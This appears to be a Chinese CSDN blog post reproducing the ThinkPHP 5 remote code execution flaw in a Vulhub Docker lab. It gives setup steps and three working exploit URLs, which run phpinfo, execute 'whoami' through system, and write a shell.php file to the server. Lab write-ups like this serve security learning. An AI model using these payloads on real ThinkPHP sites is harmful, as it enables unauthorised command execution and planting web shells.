首先进入靶场环境
cd /usr/local/vulhub/vulhub/thinkphp/5-rce(这个是我自己的路径,大家以自己的为主)
输入vim docker-compose.yml
将version改为“2”,:wq保存退出
接着执行
docker-compose up -d(在开启的时候要注意端口是否冲突,将自己之前的退出)
此时环境以成功搭建
漏洞复现
(1)输出关于 PHP 配置的信息
/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
(2)whoami
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
(3)还可以将php代码写入文件
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>
接着访问shell.php
————————————————
版权声明:本文为CSDN博主「重楼学网安」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/m0_68471358/article/details/131816873